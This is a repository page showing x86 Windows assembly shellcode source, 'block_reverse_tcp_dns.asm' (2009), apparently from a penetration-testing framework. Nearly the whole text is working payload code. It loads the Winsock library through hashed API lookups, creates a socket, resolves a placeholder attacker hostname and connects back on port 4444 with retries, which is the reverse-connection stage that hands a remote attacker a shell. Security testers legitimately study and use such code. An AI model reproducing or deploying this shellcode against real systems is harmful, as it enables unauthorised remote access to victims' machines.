root / external / source / shellcode / windows / x86 / src / block / block_reverse_tcp_dns.asm @ master
History | View | Annotate | Download (2.9 kB)
| 1 |
;-----------------------------------------------------------------------------; |
|---|---|
| 2 |
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) |
| 3 |
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 |
| 4 |
; Version: 1.0 (24 July 2009) |
| 5 |
;-----------------------------------------------------------------------------; |
| 6 |
[BITS 32] |
| 7 |
|
| 8 |
; Input: EBP must be the address of 'api_call'. |
| 9 |
; Output: EDI will be the socket for the connection to the server |
| 10 |
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) |
| 11 |
|
| 12 |
reverse_tcp: |
| 13 |
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. |
| 14 |
push 0x5F327377 ; ... |
| 15 |
push esp ; Push a pointer to the "ws2_32" string on the stack. |
| 16 |
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) |
| 17 |
call ebp ; LoadLibraryA( "ws2_32" ) |
| 18 |
|
| 19 |
mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) |
| 20 |
sub esp, eax ; alloc some space for the WSAData structure |
| 21 |
push esp ; push a pointer to this stuct |
| 22 |
push eax ; push the wVersionRequested parameter |
| 23 |
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) |
| 24 |
call ebp ; WSAStartup( 0x0190, &WSAData ); |
| 25 |
|
| 26 |
push eax ; if we succeed, eax wil be zero, push zero for the flags param. |
| 27 |
push eax ; push null for reserved parameter |
| 28 |
push eax ; we do not specify a WSAPROTOCOL_INFO structure |
| 29 |
push eax ; we do not specify a protocol |
| 30 |
inc eax ; |
| 31 |
push eax ; push SOCK_STREAM |
| 32 |
inc eax ; |
| 33 |
push eax ; push AF_INET |
| 34 |
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) |
| 35 |
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); |
| 36 |
xchg edi, eax ; save the socket for later, don't care about the value of eax after this |
| 37 |
|
| 38 |
get_address: |
| 39 |
jmp get_hostname |
| 40 |
|
| 41 |
got_hostname: |
| 42 |
push 0x803428A9 ; hash( "ws2_32.dll", "gethostbyname" ) |
| 43 |
call ebp ; gethostbyname( "name" ); |
| 44 |
|
| 45 |
set_address: |
| 46 |
mov eax, [eax+28] ; names |
| 47 |
push byte 0x05 ; retry counter |
| 48 |
push eax ; host address |
| 49 |
push 0x5C110002 ; family AF_INET and port 4444 |
| 50 |
mov esi, esp ; save pointer to sockaddr struct |
| 51 |
|
| 52 |
try_connect: |
| 53 |
push byte 16 ; length of the sockaddr struct |
| 54 |
push esi ; pointer to the sockaddr struct |
| 55 |
push edi ; the socket |
| 56 |
push 0x6174A599 ; hash( "ws2_32.dll", "connect" ) |
| 57 |
call ebp ; connect( s, &sockaddr, 16 ); |
| 58 |
|
| 59 |
test eax,eax ; non-zero means a failure |
| 60 |
jz short connected |
| 61 |
|
| 62 |
handle_failure: |
| 63 |
dec dword [esi+8] |
| 64 |
jnz short try_connect |
| 65 |
|
| 66 |
failure: |
| 67 |
push 0x56A2B5F0 ; hardcoded to exitprocess for size |
| 68 |
call ebp |
| 69 |
|
| 70 |
get_hostname: |
| 71 |
call got_hostname |
| 72 |
|
| 73 |
hostname: |
| 74 |
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", 0x00 |
| 75 |
|
| 76 |
connected: |
| 77 |
|